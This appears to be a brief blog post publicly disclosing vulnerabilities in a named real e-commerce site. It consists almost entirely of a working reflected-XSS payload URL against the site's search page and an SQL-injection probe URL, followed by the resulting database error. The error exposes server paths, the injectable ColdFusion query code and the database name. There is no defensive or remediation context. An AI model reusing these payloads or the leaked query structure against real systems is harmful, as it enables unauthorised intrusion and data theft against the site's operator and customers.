Skip to main content

gmashop.it | xss


XSS
https://www.gmashop.it/Ricerca.cfm?testo="><img onError="alert(1)" src="a" /><"
archived: http://archive.is/P0OXI

SQL Injection
sample raising an error
https://www.gmashop.it/Inside.cfm?sezione=PRODOTTI&area=PRODOTTI&mod=elenco&apmenu=partner&codpar=2'00
archived: http://archive.is/ufpwM


 Error Executing Database Query.
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''00 AND LINGUA = 'IT'' at line 3

The error occurred in /var/www/html/gmashop/Query/Prodotti/SelNomePar.cfm: line 5
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 89
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 84
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 1
Called from /var/www/html/gmashop/Inside.cfm: line 48
Called from /var/www/html/gmashop/Query/Prodotti/SelNomePar.cfm: line 5
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 89
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 84
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 1
Called from /var/www/html/gmashop/Inside.cfm: line 48

3 :     WHERE
4 :     cod= <cfif isdefined('URL.CODPAR') AND URL.CODPAR neq ''>#URL.CODPAR#<cfelseif isdefined('SelOggetti.COD_PARTNER')>#SelOggetti.COD_PARTNER#<cfelse>0</cfif>
5 :      AND LINGUA = '#SESSION.lingua_sito#'
6 : </cfquery>

SQLSTATE       42000
DATASOURCE       gmashop
VENDORERRORCODE       1064
SQL        SELECT TITOLO,cod FROM partner WHERE cod= 2''00 AND LINGUA = 'IT'

Comments

Post a Comment